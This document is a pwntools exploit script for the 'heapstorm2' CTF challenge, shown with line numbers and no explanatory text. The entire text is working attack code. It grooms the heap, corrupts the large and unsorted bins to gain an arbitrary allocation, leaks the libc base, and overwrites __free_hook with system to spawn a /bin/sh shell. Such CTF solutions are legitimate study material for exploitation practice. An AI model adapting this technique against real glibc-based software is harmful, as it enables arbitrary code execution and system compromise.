1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113
| from pwn import * p = process('./heapstorm2') libc = ELF('libc.so.6') context.log_level='debug' context.terminal = ['gnome-terminal','-x','bash','-c']
def q(): gdb.attach(p) raw_input('test')
def add(size): p.recvuntil('Command: ') p.sendline('1') p.recvuntil('Size: ') p.sendline(str(size)) p.recvuntil('Allocated')
def update(idx,size,con): p.recvuntil('Command: ') p.sendline('2') p.recvuntil('Index: ') p.sendline(str(idx)) p.recvuntil('Size: ') p.sendline(str(size)) p.recvuntil('Content: ') p.send(con)
def dele(idx): p.recvuntil('Command') p.sendline('3') p.recvuntil('Index') p.sendline(str(idx))
def view(idx): p.recvuntil('Command') p.sendline('4') p.recvuntil('Index') p.sendline(str(idx))
def pwn(): add(0x108) add(0x300) add(0x200) add(0x130) dele(1) dele(0) add(0x108) update(0,0x108-12,'a'*(0x108-12)) add(0x80) add(0x260) dele(1) dele(2) add(0x80) add(0x480)
add(0x108) add(0x300) add(0x200) add(0x130) dele(6) dele(5) add(0x108) update(5,0x108-12,'a'*(0x108-12)) add(0x90) add(0x250) dele(6) dele(7) add(0x90) add(0x470)
dele(7) dele(2) add(0x480) dele(2)
payload = p64(0)+p64(0x13370800-0x20)+p64(0)*2 update(4,len(payload),payload) payload = p64(0)+p64(0x13370800-0x20+8)+p64(0)+p64(0x13370800-0x20-0x18-5)+p64(0) update(9,len(payload),payload) add(0x48)
payload = p64(0)*4+p64(0x13377331)+p64(0)+p64(0x13370800+0x20) update(2,len(payload),payload)
payload = p64(0x13370800+0x20)+p64(0x100)+p64(0x13370800-0x20+3) + p64(0x100) update(0,len(payload),payload) view(1) p.recvuntil('Chunk[1]: ') unsortedbin_addr = u64(p.recv(6).ljust(8,'\x00')) log.info('unsortedbin_addr: '+hex(unsortedbin_addr)) payload = p64(0x13370800+0x20)+p64(0x100)+p64(unsortedbin_addr+0x10)+p64(0x100) update(0,len(payload),payload) view(1) p.recvuntil('Chunk[1]: ') libc_base = u64(p.recv(6).ljust(8,'\x00'))-0x3C4B20-88 log.info('libc_base: '+hex(libc_base)) system = libc_base + libc.symbols['system'] binsh = libc_base + libc.search('/bin/sh\x00').next() free_hook = libc_base + libc.symbols['__free_hook']
payload = p64(0x13370800+0x20)+p64(0x100)+p64(free_hook)+p64(0x100)+p64(binsh)+p64(0x100) update(0,len(payload),payload) update(1,8,p64(system)) dele(2) p.interactive()
pwn()
|